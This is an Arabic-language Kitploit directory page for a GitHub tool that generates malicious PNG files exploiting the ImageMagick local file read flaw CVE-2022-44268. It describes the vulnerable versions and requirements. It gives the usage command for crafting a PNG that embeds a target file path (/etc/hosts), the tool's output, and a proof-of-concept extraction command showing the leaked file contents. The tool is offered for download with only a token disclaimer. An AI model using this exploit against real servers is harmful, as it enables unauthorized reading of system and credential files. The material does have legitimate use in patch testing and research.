Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-44268 — يُنشئ ملفات PNG خبيثة لاستغلال ثغرة ImageMagick LFI (CVE-2022-44268) لقراءة ملفات عشوائية، مع سكربت استخراج لإثبات المفهوم. | Kitploit
أدوات/GitHubGitHub/pog-frog/cve-2022-44268
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubpog-frog/cve-2022-44268

cve-2022-44268

يُنشئ ملفات PNG خبيثة لاستغلال ثغرة ImageMagick LFI (CVE-2022-44268) لقراءة ملفات عشوائية، مع سكربت استخراج لإثبات المفهوم.

عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-44268

ImageMagick هي مجموعة برامج مجانية ومفتوحة المصدر ومتعددة المنصات لعرض وتحويل وتحرير الصور النقطية والمتجهة. يمكنها قراءة وكتابة أكثر من 200 تنسيق ملف صورة. ImageMagick مرخصة بموجب رخصة Apache 2.0. وهي متوفرة على شكل أدوات سطر أوامر، وكذلك واجهة برمجة تطبيقات C ومجموعة من فئات C++. Wikipedia

الإصدارات ImageMagick 7.1.0-40 وما دونها معرضة لثغرة تضمين ملف محلي. ترجع الثغرة إلى التحقق غير السليم من الإدخال الذي يقدمه المستخدم. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال ملف PNG معدّل إلى الهدف. قد يسمح الاستغلال الناجح لهذه الثغرة للمهاجم بقراءة ملفات عشوائية على النظام المستهدف.

شكر للباحثين الذين اكتشفوا هذا:

  • Bryan Gonzalez and the Ocelot Team

إنشاء PNG ضار لاستغلال ImageMagick 7.1.0-40:

  • CVE-2022-44267: رفض الخدمة
  • CVE-2022-44268: كشف المعلومات

المتطلبات

  • Python3
  • PIL (pip install Pillow)

الاستخدام

صياغة PNG باستخدام generate.py:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

إخلاء مسؤولية: كن جيدًا، من فضلك لا تستخدمه لأغراض سيئة

تنزيل الأداة